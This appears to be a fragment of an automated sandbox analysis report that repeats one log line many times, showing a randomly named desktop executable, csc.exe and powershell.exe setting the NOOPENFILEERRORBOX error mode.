                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
